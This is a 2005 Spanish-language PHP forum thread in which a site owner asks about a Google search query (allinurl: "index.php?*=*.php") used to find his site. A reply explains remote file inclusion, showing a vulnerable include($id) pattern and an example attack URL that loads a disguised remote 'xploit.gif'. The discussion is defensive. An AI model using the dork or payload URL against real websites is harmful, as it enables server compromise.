Foros del Web » Programando para Internet » PHP »

Creo que esto es interesante, la busqueda que hicieron...

Estas en el tema de Creo que esto es interesante, la busqueda que hicieron... en el foro de PHP en Foros del Web. Encontre que alguien visito mi web a traves de una busqueda de google, la busqueda es esta: allinurl: "index.php?*=*.php" Busca las paginas que pasan una ...
  #1 (permalink)  
Antiguo 05/06/2005, 12:06
Avatar de raffskizze  
Fecha de Ingreso: marzo-2004
Ubicación: ...
Mensajes: 433
Antigüedad: 13 años, 8 meses
Puntos: 0
Creo que esto es interesante, la busqueda que hicieron...

Encontre que alguien visito mi web a traves de una busqueda de google, la busqueda es esta:

allinurl: "index.php?*=*.php"

Busca las paginas que pasan una variable con el nombre de otra pagina .php
no se que sentido tiene esta busqueda supongo que sera algun "hacker sillo " buscando un fallo de seguridad en algun script, y no se por donde podria atacar mi web por ejemplo la verdad...se me ocurren cosas como meter la direccion de otra pagina en la variable otrapagina.php, pero no creo que de hay pueda sacar mucho solo un desastre en el contenido de la pagina, a ver si alguien ve algo al respecto o sabe lo que andan buscando e informan !!

Saludos... Me parecio interesante....
__________________
echo ( www.tutorial-enlace.net == tutoriales gratis ) ? 'Aprenderas gratis !!' : 'No aprenderas !!';
  #2 (permalink)  
Antiguo 06/06/2005, 01:35
 
Fecha de Ingreso: enero-2004
Mensajes: 431
Antigüedad: 13 años, 10 meses
Puntos: 6
Posiblemente un "remote include" si tu web tiene algo como esto:

include($id);

y tu url es algo asi

index.php?id=algo.php

entonces tienes problemas de seguridad

y te pueden incluir un archivo php cambiandole solo la extension (ejemplo GIF)

index.php?id=http://www.algunapagina.com/xploit.gif
__________________
El que teme preguntar, se averguenza de aprender.
  #3 (permalink)  
Antiguo 06/06/2005, 10:53
Avatar de raffskizze  
Fecha de Ingreso: marzo-2004
Ubicación: ...
Mensajes: 433
Antigüedad: 13 años, 8 meses
Puntos: 0
en mi caso no podria por que aunque si se usa un include($variable) la variable va dentro de una direccion include("contenido/$variable") entonces no puede insertar nada remoto pero bueno, sigo sin explicarme como aunque se inserte un include remoto como tu dices que conseguiria con eso puesto q la imagen o lo que fuera se ejecutaria en su servidor no en el mio, o si se ejecutara en mi servidor le harian falta datos para si acaso intentar sacar datos de la base de datos...la cual no tiene mas q los datos que muestra la web... asi que no entiendo como seria eso vulnerable... de todas formas muchas gracias por la aclaracion kezo
__________________
echo ( www.tutorial-enlace.net == tutoriales gratis ) ? 'Aprenderas gratis !!' : 'No aprenderas !!';
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 13:31.